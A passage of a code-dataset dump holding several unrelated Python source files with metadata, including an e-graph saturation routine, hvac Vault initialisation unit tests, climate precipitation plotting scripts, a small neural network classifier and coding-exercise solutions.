operand in enumerate(n.operands)]\n for substs in itertools.product(*sub_matches):\n subst = merge_substs(substs)\n if subst is not None:\n yield subst\n\n def match(self, pat):\n for n, i in self.ids.items():\n for subst in self.match_node(n, pat):\n yield i, subst\n\ndef saturate(egraph, rewrites, max_iters=1000):\n for i in range(max_iters):\n size = egraph.size()\n\n matches = []\n for rw in rewrites:\n for i, subst in egraph.match(rw.lhs):\n matches.append((i, subst, rw))\n\n for i, subst, rw in matches:\n egraph.merge(i, rw.apply(egraph, subst))\n\n egraph.rebuild()\n\n if size == egraph.size():\n return i\n","repo_name":"ychen306/egraph","sub_path":"egraph.py","file_name":"egraph.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16389644669","text":"from pelix.ipopo.decorators import ComponentFactory, Property, Requires, Provides, Instantiate, Validate\n\nfrom api.api import ValidatorInput, Validator, WebSocketComponent\nimport logging\nimport json\n\n@ComponentFactory(\"validator-websocket-factory\")\n@Property('_path', 'websocketcomponent.path', '/validation')\n@Requires('_validator','validator')\n@Provides('websocketcomponent')\n@Instantiate(\"validator-websocket-inst\")\nclass ValidatorWebSocketComponent(WebSocketComponent):\n\n def __init__(self):\n super().__init__(self._path)\n \n @Validate\n def validate(self, context):\n print('ValidatorWebSocketComponent is active!')\n \n '''\n \n message = {\n \n 'title': 'Some title for the catalog',\n 'description': 'Some description for the catalog',\n 'distributions': ['uri'*],\n 'store': true|false\n \n }\n \n '''\n def execute(self, message: str, *args, **kwargs) -> str:\n \n _input = json.loads(message)\n \n logging.info(f'Validator input message {_input}')\n \n out = self._validator.do_job(ValidatorInput.from_dict(_input))\n \n out = {**_input, 'validation': out}\n \n ret = {\"status\": \"success\", \"content\": out}\n \n return json.dumps(ret)","repo_name":"whow-project/architecture","sub_path":"whow-toolkit/WHOWToolkit/validator/shacl_validator_ws.py","file_name":"shacl_validator_ws.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14758089731","text":"import pytest\n\nfrom hvac.exceptions import ParamValidationError\nfrom hvac.api.system_backend.init import Init\n\n\n@pytest.fixture\ndef sys_init(mock_adapter):\n return Init(mock_adapter)\n\n\nINIT_SECRET_PGP_ERROR_MSG = (\n r\"length of pgp_keys list argument must equal secret_shares value\"\n)\nINIT_RECOVERY_PGP_ERROR_MSG = (\n r\"length of recovery_pgp_keys list argument must equal recovery_shares value\"\n)\nINIT_RECOVERY_SHARES_ERROR_MSG = r\"value for recovery_threshold argument must be less than or equal to recovery_shares argument\"\nINIT_STORED_SHARES_ERROR_MSG = (\n r\"value for stored_shares argument must equal secret_shares argument\"\n)\n\n\nclass TestInit:\n @pytest.mark.parametrize(\n [\"secret_shares\", \"recovery_shares\", \"expected_value\", \"expected_warn\"],\n [\n (None, None, 5, True),\n (3, None, 3, False),\n (5, 7, 5, False),\n (None, 9, None, False),\n ],\n )\n def test_initialize_default_secret_shares(\n self,\n sys_init,\n mock_warn,\n secret_shares,\n recovery_shares,\n expected_value,\n expected_warn,\n ):\n (r_args, r_kwargs) = sys_init.initialize(\n secret_shares=secret_shares,\n recovery_shares=recovery_shares,\n recovery_threshold=0,\n )\n params = r_kwargs[\"json\"]\n assert params[\"secret_shares\"] == expected_value\n\n if expected_warn:\n mock_warn.assert_called_once()\n else:\n mock_warn.assert_not_called()\n\n @pytest.mark.parametrize(\n [\"secret_threshold\", \"recovery_threshold\", \"expected_value\", \"expected_warn\"],\n [\n (None, None, 3, True),\n (3, None, 3, False),\n (5, 7, 5, False),\n (None, 9, None, False),\n ],\n )\n def test_initialize_default_secret_threshold(\n self,\n sys_init,\n mock_warn,\n secret_threshold,\n recovery_threshold,\n expected_value,\n expected_warn,\n ):\n (r_args, r_kwargs) = sys_init.initialize(\n secret_threshold=secret_threshold,\n recovery_threshold=recovery_threshold,\n secret_shares=0,\n )\n params = r_kwargs[\"json\"]\n assert params[\"secret_threshold\"] == expected_value\n\n if expected_warn:\n mock_warn.assert_called_once()\n else:\n mock_warn.assert_not_called()\n\n @pytest.mark.parametrize(\n [\n \"secret_shares\",\n \"pgp_keys\",\n \"stored_shares\",\n \"recovery_shares\",\n \"recovery_pgp_keys\",\n \"recovery_threshold\",\n \"exc_msg\",\n ],\n [\n (\n 2,\n [1, 2, 3],\n 2,\n None,\n None,\n None,\n INIT_SECRET_PGP_ERROR_MSG,\n ),\n (\n 2,\n [1, 2, 3],\n 3,\n None,\n None,\n None,\n INIT_SECRET_PGP_ERROR_MSG,\n ),\n (\n 2,\n [1, 2],\n 3,\n None,\n None,\n None,\n INIT_STORED_SHARES_ERROR_MSG,\n ),\n (2, [1, 2], 2, 3, [1, 2], None, INIT_RECOVERY_PGP_ERROR_MSG),\n (2, [1, 2], 2, 3, [1, 2], 1, INIT_RECOVERY_PGP_ERROR_MSG),\n (2, [1, 2], 2, 3, [1, 2], 9, INIT_RECOVERY_SHARES_ERROR_MSG),\n ],\n )\n def test_initialize_errors(\n self,\n sys_init,\n mock_adapter,\n secret_shares,\n pgp_keys,\n stored_shares,\n recovery_shares,\n recovery_pgp_keys,\n recovery_threshold,\n exc_msg,\n ):\n with pytest.raises(ParamValidationError, match=exc_msg):\n sys_init.initialize(\n secret_threshold=0, # TODO(v3.0.0): remove this, only set to suppress warning\n secret_shares=secret_shares,\n pgp_keys=pgp_keys,\n stored_shares=stored_shares,\n recovery_shares=recovery_shares,\n recovery_pgp_keys=recovery_pgp_keys,\n recovery_threshold=recovery_threshold,\n )\n\n mock_adapter.request.assert_not_called()\n\n def test_initialize_value_pass(self, sys_init):\n (r_args, r_kwargs) = sys_init.initialize(\n secret_threshold=0,\n secret_shares=2,\n root_token_pgp_key=\"abc\",\n pgp_keys=[1, 2],\n stored_shares=2,\n recovery_shares=3,\n recovery_pgp_keys=[1, 2, 3],\n recovery_threshold=3,\n )\n params = r_kwargs[\"json\"]\n\n assert params[\"secret_threshold\"] == 0\n assert params[\"secret_shares\"] == 2\n assert params[\"root_token_pgp_key\"] == \"abc\"\n assert params[\"pgp_keys\"] == [1, 2]\n assert params[\"stored_shares\"] == 2\n assert params[\"recovery_shares\"] == 3\n assert params[\"recovery_pgp_keys\"] == [1, 2, 3]\n assert params[\"recovery_threshold\"] == 3\n","repo_name":"hvac/hvac","sub_path":"tests/unit_tests/api/system_backend/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":1152,"dataset":"github-code","pt":"72"} +{"seq_id":"12536214291","text":"from dataclasses import dataclass\nfrom typing import Optional\n\nfrom brevet_top_plot_a_route.route_point import RoutePoint\n\n\n@dataclass\nclass CheckPoint(RoutePoint):\n name: str = None\n\n def __init__(self, **kwargs):\n name: str = kwargs.pop(\"name\", \"\")\n super().__init__(**kwargs)\n self.name = name\n self.fix_name()\n\n @classmethod\n def from_route_point(cls, point: RoutePoint, name: str = \"\"):\n return cls(**point.__dict__, name=name)\n\n def __repr__(self):\n return (\n f\"\"\n )\n\n def fix_name(self, replacement: Optional[str] = None) -> Optional[str]:\n \"\"\"\n Copy the point description to the name property\n\n :param replacement: optional control name if not specified in the route\n :return: the name\n \"\"\"\n self.name = (self.name or self.labtxt or self.dir or replacement or \"\").strip()\n return self.name\n\n def find_labels(self) -> list:\n \"\"\"\n Find checkpoints defined in symlabs/lab/labtxt tags.\n\n :return: a list of new CheckPoints\n \"\"\"\n for label in self.symlabs:\n cp = CheckPoint(**label, labtxt=label.get(\"lab\", {}).get(\"labtxt\"))\n\n return [\n CheckPoint(**label, labtxt=label.get(\"lab\", {}).get(\"labtxt\"))\n for label in self.symlabs\n ]\n","repo_name":"grisxa/brevet-top-functions","sub_path":"brevet_top_plot_a_route/src/brevet_top_plot_a_route/check_point.py","file_name":"check_point.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"92763958","text":"# def updown(name):\n# answer = 0\n# for n in name:\n# if ord(n) == ord('Z'):\n# answer += 1\n# elif ord(n) > ord(\"L\") and ord(n) != ord('Z'):\n# answer += 1\n# answer += (ord('Z') - (ord(n)))\n# else:\n# answer +=((ord(n)) - ord('A'))\n# return answer\n\n# def left(name):\n# n = (len(name)//2) \n# if 'A' in name[n:]:\n# return (len(name) - (name.count('A'))-1)\n# else:\n# return (len(name) - 1)\n\n# def solution(name):\n# print(updown(name))\n# print(left(name))\n# answer=updown(name) + left(name)\n# return answer\n\n#코드 발췌 : https://jgrammer.tistory.com/entry/%ED%94%84%EB%A1%9C%EA%B7%B8%EB%9E%98%EB%A8%B8%EC%8A%A4-%EC%A1%B0%EC%9D%B4%EC%8A%A4%ED%8B%B1\n\ndef solution(name):\n make_name = [min(ord(i) - ord(\"A\"), ord(\"Z\") - ord(i)+1) for i in name] #가장 작은 경우의 수를 넣기\n idx, answer = 0, 0 \n while True:\n answer += make_name[idx]\n make_name[idx] = 0\n if sum(make_name) ==0: #문자의 하나씩 돌면서 확인하고, 확인했으면 0으로 만들기 \n break\n left, right = 1, 1\n while make_name[idx - left] ==0: #0이면 계속 돌아라. 최솟값을 찾는 것이므로 작을수록 좋겠지\n left +=1\n while make_name[idx + right] ==0: #마찬가지로 0이면 계속 옆으로 가라\n right +=1\n answer += left if left < right else right #더 작은 값을 더하고\n idx += -left if left < right else right #만약 왼쪽으로 가는 게 더 작으면 빼야 하고, 그게 아니라면 index를 더해야 함\n return answer\n","repo_name":"ms-kim520/Coding_Study","sub_path":"programmers_level2_조이스틱.py","file_name":"programmers_level2_조이스틱.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14956749007","text":"from elasticai.creator.file_generation.savable import Path, Savable\nfrom elasticai.creator.file_generation.template import InProjectTemplate\n\n\nclass MacDesign(Savable):\n def __init__(self, name: str, vector_width: int, fxp_params):\n self._name = name\n self._vector_width = vector_width\n self._fxp_params = fxp_params\n\n def save_to(self, destination: Path) -> None:\n wrapper = InProjectTemplate(\n package=\"elasticai.creator.nn.fixed_point.mac\",\n file_name=\"mac_design.tpl.vhd\",\n parameters={\n \"total_width\": str(self._fxp_params.total_bits),\n \"frac_width\": str(self._fxp_params.frac_bits),\n \"vector_width\": str(self._vector_width),\n \"name\": self._name,\n },\n )\n core_component = InProjectTemplate(\n package=\"elasticai.creator.nn.fixed_point.mac\",\n file_name=\"fxp_mac.tpl.vhd\",\n parameters={},\n )\n destination.create_subpath(\"fxp_mac\").as_file(\".vhd\").write(core_component)\n destination.create_subpath(self._name).as_file(\".vhd\").write(wrapper)\n","repo_name":"es-ude/elastic-ai.creator","sub_path":"elasticai/creator/nn/fixed_point/mac/design.py","file_name":"design.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"72"} +{"seq_id":"12578535963","text":"\"\"\"\nTest the add_cyclic_point function from the cyclic module.\n\nIn this module we'll write simple functions to test the code we wrote\nfor add_cyclic_point in the cyclic module. We'll be using pytest to\nrun the tests, and for some helpful features when writing tests.\n\n\"\"\"\nimport numpy as np\n\nfrom cyclic import add_cyclic_point\n\n\ndef test_default():\n \"\"\"\n Test add_cyclic_point with a 1-d array and no keywords.\n\n Input: [0, 1, 2, 3, 4]\n Expected ouput: [0, 1, 2, 3, 4, 0]\n\n \"\"\"\n data = np.array([0, 1, 2, 3, 4], dtype=np.int)\n cyclic_data = add_cyclic_point(data)\n # The output should be 1 element longer than the input:\n assert cyclic_data.size == data.size + 1\n # The first and last elements of the output should be the same:\n assert cyclic_data[0] == cyclic_data[-1]\n # The elements of the output up-to the last should be the same as\n # the input:\n assert (cyclic_data[:-1] == data).all()\n","repo_name":"duncanwp/python_for_climate_scientists","sub_path":"course_content/pytest-example/test_cyclic.py","file_name":"test_cyclic.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"73597622953","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\n\n###### lat longs to plot #############\nlats = [34.097754, 34.164203, 32.718561, 31.104153, 31.708595, 30.316496, 30.086927, 29.945690, 27.338936, 27.084368]\nlons = [74.814425, 77.584813, 74.858092, 77.170973, 76.932037, 78.032188, 78.267609, 78.164246, 88.606506, 93.605316]\n\n\nnewx = np.arange(71.875,100.125,.25)\nnewy = np.arange(24.875,38.125,.25)\n\ncM = plt.cm.get_cmap('seismic')\nreversedCM = cM.reversed()\n\ncolorM = reversedCM\n\nindices3 = ['CDD']\nindices2 = ['SDII']\nindices = ['CWD','PRCPTOT', 'R10mm', 'R20mm', 'R95PTOT', 'R99PTOT', 'Rx1day', 'Rx5day']\n\nunits = { 'CDD' : 'days',\n'CWD': 'days',\n'PRCPTOT' : 'mm',\n'R10mm' : 'days',\n'R20mm' : 'days',\n'R95PTOT' : 'mm',\n'R99PTOT' : 'mm',\n'Rx1day' : 'mm',\n'Rx5day' : 'mm',\n'SDII' : 'mm'\n}\n\nfor index in indices2:\n historical = np.load('Calculated Data\\historical\\\\'+ index +'_historical_40years.npy')\n period1 = np.load('Calculated Data\\period1\\\\'+ index +'_period1_40years.npy')\n period2 = np.load('Calculated Data\\period2\\\\'+ index +'_period2_40years.npy')\n\n print(historical.shape)\n print(period1.shape)\n print(period2.shape)\n\n fig, axes = plt.subplots(1,2, figsize=(10, 4))\n fig.tight_layout(pad=2.0)\n\n\n\n difference1 = period1-historical\n\n difference2 = period2-historical\n\n################### Find maximum and minimum values and corresponding latitude and longitude ########################\n\n print(np.max(difference1))\n print(np.min(difference1))\n\n print('-------------')\n\n print(np.max(difference2))\n print(np.min(difference2))\n \n \n max1 = max(abs(np.max(difference1)), abs(np.min(difference1)))\n \n max2 = max(abs(np.max(difference2)), abs(np.min(difference2)))\n\n minmin = -(max(max1,max2))\n maxmax = max(max1,max2)\n\n print(minmin)\n print(maxmax)\n\n ################################\n \n\n\n\n axes[0].set_title('(a) Change in '+ index +' in Period 1 (2021-2060)')\n map = Basemap(resolution='l', llcrnrlon=72, llcrnrlat=25, urcrnrlon=100, urcrnrlat=38, lat_0=22.5, lon_0= 85, ax=axes[0])\n\n # Plot Data\n cs = map.pcolor(newx, newy, difference1, cmap=colorM, shading='auto', vmin=minmin, vmax=maxmax)\n map.readshapefile(r'ShapeFiles\\Uttarakhand' , 'Uttarakhand')\n map.readshapefile('ShapeFiles\\ArunachalPradesh' , 'ArunachalPradesh', default_encoding='ISO-8859-1')\n map.readshapefile('ShapeFiles\\HimachalPradesh', 'Himachal_Pradesh')\n map.readshapefile('ShapeFiles\\Jammu_state', 'Jammu_state')\n map.readshapefile('ShapeFiles\\Sikkim', 'Sikkim')\n # map.readshapefile('ShapeFiles\\Cities\\cities2', 'Cities')\n\n # North Arrow\n x, y = map(97, 37)\n x2, y2 = (97, 34)\n\n axes[0].annotate('N', xy=(x, y), xycoords='data',\n xytext=(x2, y2), textcoords='data',\n arrowprops=dict(arrowstyle=\"->\")\n )\n \n \n a, b = map(lons, lats)\n\n map.scatter(a, b, marker='^',color='g')\n\n\n\n map.drawcountries()\n\n # Add Colorbar\n cbar = map.colorbar(cs, location='bottom', pad=\"5%\")\n cbar.set_label(units[index])\n\n ################################\n\n\n\n axes[1].set_title('(b) Change in '+ index +' in Period 2 (2061-2100)')\n map = Basemap(resolution='l', llcrnrlon=72, llcrnrlat=25, urcrnrlon=100, urcrnrlat=38, lat_0=22.5, lon_0= 85, ax=axes[1])\n\n # Plot Data\n cs = map.pcolor(newx, newy, difference2, cmap=colorM, shading='auto', vmin=minmin, vmax=maxmax)\n map.readshapefile(r'ShapeFiles\\Uttarakhand' , 'Uttarakhand')\n map.readshapefile('ShapeFiles\\ArunachalPradesh' , 'ArunachalPradesh', default_encoding='ISO-8859-1')\n map.readshapefile('ShapeFiles\\HimachalPradesh', 'Himachal_Pradesh')\n map.readshapefile('ShapeFiles\\Jammu_state', 'Jammu_state')\n map.readshapefile('ShapeFiles\\Sikkim', 'Sikkim')\n # map.readshapefile('ShapeFiles\\Cities\\cities2', 'Cities')\n\n # North Arrow\n x, y = map(97, 37)\n x2, y2 = (97, 34)\n\n axes[1].annotate('N', xy=(x, y), xycoords='data',\n xytext=(x2, y2), textcoords='data',\n arrowprops=dict(arrowstyle=\"->\")\n )\n\n \n map.drawcountries()\n\n a, b = map(lons, lats)\n\n map.scatter(a, b, marker='^',color='g')\n\n # Add Colorbar\n cbar = map.colorbar(cs, location='bottom', pad=\"5%\")\n cbar.set_label(units[index])\n\n\n # plotting\n # plt.suptitle('Difference in Consecutive Dry Days')\n plt.savefig('Plots\\Difference\\PPT\\\\'+ index + '.png')\n \n # plt.show()\n\n\n","repo_name":"tejaswarathe/Precipitation-analysis-Dissertation","sub_path":"Calculations/Plots/Difference.py","file_name":"Difference.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70413256234","text":"import sys\nimport math\n\nN = int(sys.stdin.readline())\nf = list(str(math.factorial(N)))\nf.reverse()\n\ncnt = 0\nfor i in f:\n if i == '0':\n cnt += 1\n else:\n break\nprint(cnt)","repo_name":"becca4011/Baekjoon","sub_path":"1676_팩토리얼 0의 개수.py","file_name":"1676_팩토리얼 0의 개수.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1860812096","text":"import layer as ly\nimport numpy\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import minmax_scale\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom time import sleep\nimport time\n\n\n#--------------------#\n\n\n# float -> float\n# Derivative of sigmoid function\ndef transferDerivative(x):\n return x*(1.0-x)\n\n# List, int -> List\n# Given a cardinal number and the number of classes, returns a binary classification vector\n# e.g classVector(1,3) = [0 1 0], classVector(1,2) = [0 1], classVector(0,1) = [0]\ndef classVector(vector, classes):\n num = vector[0]\n if(not type(num)==int):\n num = int(num)\n vec = [0]*classes\n vec[num%classes] = 1\n return vec\n\n# List -> List\n# Given a vector of real numbers between 0 and 1, returns an array with 0s and 1s\ndef toBin(vector):\n bin = []\n for num in vector:\n if(num < 0.5):\n bin.append(0)\n else:\n bin.append(1)\n return bin\n\nclass Network:\n\n # int, int, int, List -> Network\n # Receives number of layers, number of inputs and number of neurons per layers of the network\n def __init__(self, nlayers, ninputs, nneuronslayer):\n self.mylayers = []\n self.nlastlayer = nlayers-1\n self.ninputs = ninputs\n previousneurons = ninputs\n for i in range(nlayers):\n self.mylayers.append(ly.Layer(nneuronslayer[i], previousneurons))\n previousneurons = nneuronslayer[i]\n\n\n # List -> List\n # Receives a Python list as input, returns the valuation of the network\n def feed(self, input):\n nextinput = input\n for layer in self.mylayers:\n nextinput = layer.feed(nextinput)\n return nextinput\n\n\n # List List [float]-> None\n # Trains the network using the given inputs and desiredoutputs\n def train(self, input, desiredoutput, learningrate = 0.2):\n lr = learningrate\n output = self.feed(input)\n self.errorBackpropagation(desiredoutput)\n self.updateWeightandBias(input, lr)\n\n # None -> List\n # Get the last output of the network\n def getLastOutput(self):\n return self.mylayers[self.nlastlayer].getOutputs()\n\n # List -> None\n # Updates delta in every neuron using the expected value\n def errorBackpropagation(self, expected):\n current = self.nlastlayer\n while(current >= 0):\n if(current == self.nlastlayer): #output layer\n output = numpy.asarray(self.mylayers[current].getOutputs())\n errorvector = expected - output\n deltalist = (errorvector * transferDerivative(output)).tolist()\n self.mylayers[current].updateDeltas(deltalist)\n current-=1\n else: #hidden and input layers\n output = numpy.asarray(self.mylayers[current].getOutputs())\n weightmatrix = numpy.asmatrix(self.mylayers[current+1].getWeights())\n deltamatrix = numpy.asmatrix(self.mylayers[current+1].getDeltas())\n errorvector = numpy.asarray(deltamatrix*weightmatrix)[0]\n deltalist = (errorvector * transferDerivative(output)).tolist()\n self.mylayers[current].updateDeltas(deltalist)\n current-=1\n\n\n # List -> None\n # Updates the weights and bias of the network\n def updateWeightandBias(self, input, lr):\n current = 0\n for layer in self.mylayers:\n if(current == 0): #input layer\n layer.updateWeightandBiasusingLR(input, lr)\n current+=1\n else: #current > 0\n previousoutput = self.mylayers[current-1].getOutputs()\n layer.updateWeightandBiasusingLR(previousoutput, lr)\n current+=1\n\n\n#------------ Inserción de datos ----------------------- #\n # string, int, [float], [boolean] -> None\n # Given a csv file name (e.g: \"data.csv\"), trains a classificator network by nepoch epochs\n # plotting the cuadratic error and precison obtained.\n def dataClasification(self, dtname, nepoch, learningrate = 0.2, randshuffle = False, timer = False):\n try:\n dt = numpy.loadtxt(dtname,delimiter = \",\") #Cargamos el dataset csv\n except:\n print(\"No se encuentra el archivo \"+dtname)\n return\n rows, cols = dt.shape\n X = dt[:,0:cols-1] #split en datos y clases\n X_norm = minmax_scale(X) #Normalizamos los datos con el criterio visto en clases\n y = dt[:,cols-1:]\n numofclasses = len(numpy.unique(y)) #calculamos el numero total de clases\n X_train, X_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.33, random_state = 27) #Separamos los datos en train/test\n error = []\n precision = []\n epochs = list(range(nepoch+1))\n print(\"Trabajando con un dataset de \"+str(rows)+\" observaciones, con \"+str(cols)+\" atributos cada una\")\n print(\"Número de épocas: \"+str(nepoch))\n print(\"¿Se reordena el training set en cada epoch?: \"+str(randshuffle))\n print(\"Learning rate de la red: \"+str(learningrate))\n print(\"Cantidad de clases del dataset: \"+str(numofclasses))\n sleep(2)\n print(\"Inicio de computo por epochs, esto toma tiempo...\")\n start_time = time.time()\n for epoch in epochs:\n if(randshuffle): #Mezclamos el orden de las tuplas en caso de quererlo\n X_train, y_train = shuffle(X_train, y_train)\n if(epoch == 0): #Anotamos valores sin training alguno de la red\n totalerror = 0\n for i in range(len(X_train)):\n expected = classVector(y_train[i],numofclasses) #Generamos el vector de clase deseado\n raw_output = self.feed(X_train[i]) #Output sin entrenar\n errorvector = numpy.asarray(expected) - numpy.asarray(raw_output) #Comparamos output y expected\n squarevector = errorvector**2\n totalerror += squarevector.sum() #Guardamos el error cuadrático\n meanerror = (totalerror*1.0)/len(X_train) #Sacamos la media de los errores\n error.append(meanerror)\n #Fin de check de errores sin training\n #Calculo de precision sin training\n hits = 0\n for j in range(len(X_test)):\n output = self.feed(X_test[j])\n binOutput = toBin(output) #Discretizamos el vector de salida\n expected = classVector(y_test[j],numofclasses)\n if(expected == binOutput):\n hits += 1 #Si son iguales, entonces es un acierto\n epochprec = hits*1.0/len(X_test)\n precision.append(epochprec)\n print(\"Fin epoch \"+str(epoch)+\"!\")\n #Fin de testing, se acumula la precision en el vector correspondiente\n else:\n #Inicio de training\n totalerror = 0\n for i in range(len(X_train)):\n expected = classVector(y_train[i],numofclasses) #Generamos el vector de clase deseado\n self.train(X_train[i], expected, learningrate) #Entrenamos a la red\n errorvector = numpy.asarray(expected) - numpy.asarray(self.getLastOutput()) #Comparamos output y expected\n squarevector = errorvector**2\n totalerror += squarevector.sum() #Guardamos el error cuadrático\n meanerror = (totalerror*1.0)/len(X_train) #Sacamos la media de los errores\n error.append(meanerror)\n #Fin de training, se acumula error en el vector correspondiente\n #Inicio de testing\n hits = 0\n for j in range(len(X_test)):\n output = self.feed(X_test[j])\n binOutput = toBin(output) #Discretizamos el vector de salida\n expected = classVector(y_test[j],numofclasses)\n if(expected == binOutput):\n hits += 1 #Si son iguales, entonces es un acierto\n epochprec = hits*1.0/len(X_test)\n precision.append(epochprec)\n print(\"Fin epoch \"+str(epoch)+\"!\")\n #Fin de testing, se acumula la precision en el vector correspondiente\n tiempo = round(time.time() - start_time, 3)\n if(timer):\n print(\"Tiempo de proceso: \"+str(tiempo)+\" segundos\")\n return\n fullerror = numpy.asarray(error[1:]).sum()\n fullprecision = numpy.asarray(precision[1:]).sum()\n finalerror = round(fullerror/nepoch,3)\n finalprecision = round(fullprecision/nepoch, 3)\n plotcond = \"Learning rate =\"+str(learningrate)+\", Row Shuffle=\"+str(randshuffle)+\", (meanerror, meanprecision) = (\"+str(finalerror)+\", \"+str(finalprecision)+\")\"\n plt.subplot(2, 1, 1)\n plt.plot(epochs,error, '.-')\n plt.title(plotcond)\n plt.ylabel(\"Error cuadratico\")\n\n plt.subplot(2, 1, 2)\n plt.plot(epochs,precision, '.-')\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Precision\")\n plt.show()\n","repo_name":"sebcif/NeuronasPrim2018","sub_path":"Tarea1/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41781081813","text":"# -*- coding:utf-8 -*-\nimport numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\n#直方图和概率密度曲线\na = np.random.normal(size=1000)\nprint(a,end=',')\nbins = np.arange(-4, 5)\nprint(bins)\nhistogram = np.histogram(a, bins=bins, normed=True)[0]\nbins = 0.5 * (bins[1:] + bins[:-1])\nprint(bins)\n\nb = stats.norm.pdf(bins)#对拟合出来的正态分布绘制对应的概率密度曲线\nplt.plot(bins, histogram)\nplt.plot(bins, b)\nplt.show()\n\n# 百分位,百分位是CDF的一个估计器(累积分布函数)。\nprint(np.median(a))\nprint(stats.scoreatpercentile(a, 50))\nprint(stats.scoreatpercentile(a, 90))\n\n# 统计检验\nc = np.random.normal(0, 1, size=100)\nd = np.random.normal(1, 1, size=10)\nprint(stats.ttest_ind(c, d))\n","repo_name":"Susuqu/bioinformatics","sub_path":"private_pku/docs/ppt/ref/scipy_stats.py","file_name":"scipy_stats.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14812252879","text":"from folium import folium\n\nimport methods\nimport trasy\nimport markers\n\nlat = 50.74028\nlng = 16.64504\n\nmapka = folium.Map(location=[lat, lng], zoom_start=8, control_scale=True)\ntrasy.trasy_sudety2016(mapka)\ntrasy.trasy_sudety2018(mapka)\ntrasy.trasy_sudety2019(mapka)\nmarkers.corona_marker(mapka)\nmethods.popup2015do2020(mapka, lat, lng)\ntooltip = 'RAPORT z wszystkich tras w Sudetach i Górach Świętokrzyskich'\nmethods.marker_raport(mapka, lat, lng, methods.popup_raport(), tooltip)\nmethods.open_webb_and_save(mapka, 'C:/Users/zs/Downloads/Sudety.html')\n","repo_name":"zszurman/caminozs","sub_path":"rsudety.py","file_name":"rsudety.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34631250206","text":"n = int(input())\r\nlst = list(map(int, input().split()))\r\nx = 2 ** n\r\nlst1 = lst[:x//2]\r\nlst2 = lst[x//2:]\r\n\r\n\r\ns1 = max(lst1)\r\ns2 = max(lst2)\r\n\r\nif s1 < s2:\r\n print(lst1.index(s1) + 1)\r\nelse:\r\n print(lst2.index(s2) + len(lst1) + 1)","repo_name":"YamasouA/Atcoder","sub_path":"abc188-c.py","file_name":"abc188-c.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28170626184","text":"cheese = [3, 2, 5, 6, 7, 3, 2]\ncrackers = [4, 5, 6, 7, 3, 5, 7]\nname = ['Max','Felix','Alex','Vivian','Ethan','Justine','Troy']\n\n# number 1\ndef histogram(l):\n d = {}\n for item in l:\n d.setdefault(item, 0)\n d[item] += 1\n\n return d\n\nprint(histogram(cheese))\n\n# number 2\ndef dictmaker(keylist, valuelist): # same thing as last time\n if len(keylist) != len(valuelist):\n return\n\n d = {}\n for i in range(0, len(keylist)):\n d[keylist[i]] = valuelist[i] \n\n listmax = max(list(d.values()))\n\n return d, list(d.keys())[list(d.values()).index(listmax)]\n\ncheesedict = dictmaker(name, cheese)[0]\ncrackerdict = dictmaker(name, crackers)[0]\nprint(cheesedict)\nprint(crackerdict)\n\n# number 3\ndef dictlookup(d, target):\n return [key for key in d if d[key] == target]\n\nprint(dictlookup(cheesedict, 3))\nprint(dictlookup(crackerdict, 7))\n","repo_name":"JustineTang10/python-class","sub_path":"4-18-2021.py","file_name":"4-18-2021.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3988136730","text":"from django.core.exceptions import ValidationError\n\n\ndef validate_phone(phone_str):\n phone_error = False\n if len(phone_str) == 10 or len(phone_str) == 11:\n c = [i for i in phone_str if i.isdecimal()]\n if c[0] == '8' and len(c) == 11:\n c = ['+', '7'] + c[1:]\n elif c[0] == '9' and len(c) == 10:\n c = ['+', '7'] + c\n elif c[0] == '7' and len(c) == 11:\n c = ['+', '7'] + c[1:]\n else:\n phone_error = True\n if phone_error:\n raise ValidationError('Проверьте номер телефона')\n else:\n # qwe = c[:2] + ['('] + c[2: 5] + [')'] + c[5: 8] + ['-'] + c[8:10] + ['-'] + c[10:]\n return ''.join(c)\n else:\n raise ValidationError('Проверьте длинну номера телефона')","repo_name":"MrFakir/zoobase","sub_path":"zoobase/app/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41306261842","text":"from project.booths.booth import Booth\nfrom project.booths.open_booth import OpenBooth\nfrom project.booths.private_booth import 